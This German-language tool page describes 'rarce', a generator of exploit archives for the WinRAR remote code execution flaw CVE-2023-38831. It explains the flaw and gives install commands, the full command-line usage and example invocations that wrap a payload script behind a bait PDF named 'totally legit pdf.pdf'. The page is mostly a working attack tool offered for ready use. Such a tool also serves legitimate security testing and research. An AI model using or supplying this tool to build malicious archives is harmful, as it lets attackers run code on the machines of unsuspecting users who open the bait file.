
Ein einfach zu installierendes und einfach auszuführendes Tool zum Generieren von Exploit-Payloads für CVE-2023-38831, WinRAR RCE vor Version 6.23
Dies ist ein einfach zu installierender und einfach zu verwendender, vielseitiger Exploit-Generator für CVE-2023-38831, eine Schwachstelle, die WinRAR-Versionen vor 6.23 betrifft.
RARLabs WinRAR vor 6.23 ermöglicht Angreifern die Ausführung von beliebigem Code, wenn ein Benutzer versucht, eine harmlose Datei in einem ZIP-Archiv anzuzeigen. Das Problem tritt auf, weil ein ZIP-Archiv eine harmlose Datei (z. B. eine gewöhnliche .JPG-Datei) und auch einen Ordner enthalten kann, der denselben Namen wie die harmlose Datei hat, und der Inhalt des Ordners (der ausführbare Inhalte enthalten kann) beim Versuch, nur auf die harmlose Datei zuzugreifen, verarbeitet wird. Diese Schwachstelle wurde von April bis August 2023 in freier Wildbahn ausgenutzt.

Sie können das Tool einfach per pip installieren.
pip install rarce
Oder Sie können es aus dem Quellcode verwenden.
git clone https://github.com/ignis-sec/CVE-2023-38831-RaRCE
cd CVE-2023-38831-RaRCE
python3 setup.py install
usage: rarce [-h] [-v] [-i] [-dt] [-pt PRESERVE_TEMP] bait switch output
Exploit-Generator für CVE-2023-38831
positionale Argumente:
bait Pfad zur Köderdatei, die dem Archiv hinzugefügt werden soll.
switch Pfad zur Payload, die beim Doppelklick die Köderdatei ersetzt.
output Pfad zur Ausgabedatei.
optionale Argumente:
-h, --help Zeigt diese Hilfemeldung an und beendet das Programm.
-v, --verbose Ausführliche Ausgabe.
-i, --ignore-path-check
Ignoriert die Pfadprüfung. Wenn gesetzt, kann rarce vorhandene Dateien im Ausgabeparameter überschreiben und fehlende Ordner für den Ausgabepfad erstellen.
-dt, --dont-use-tempdir
Verhindert die Erstellung eines temporären Verzeichnisses beim Erstellen des Exploits. Stattdessen werden die Zwischenordner im aktuellen Arbeitsverzeichnis erstellt.
-pt PRESERVE_TEMP, --preserve-temp PRESERVE_TEMP
Behält das temporäre Verzeichnis nach dem Erstellen des Exploits bei. Hat keine Auswirkung, wenn -dt oder --dont-use-tempdir nicht angegeben ist.
Nach der Installation per pip oder setup.py können Sie dieses Tool von der Befehlszeile aus verwenden. Der folgende Befehl erstellt die Exploit-Datei für Sie. Wenn ein Benutzer auf die Köderdatei doppelklickt, wird stattdessen das Payload-Skript oder die ausführbare Datei ausgeführt.
$ rarce "totally legit pdf.pdf" "payload.cmd" "exploit.rar"
Optional können Sie es als ausführbares Modul verwenden.
python -m rarce "totally legit pdf.pdf" "payload.cmd" "exploit.rar"
Sie können es auch in Ihrem vorhandenen Code verwenden.
from rarce import exploit
exploit("totally legit pdf.pdf", "payload.cmd", "exploit.rar")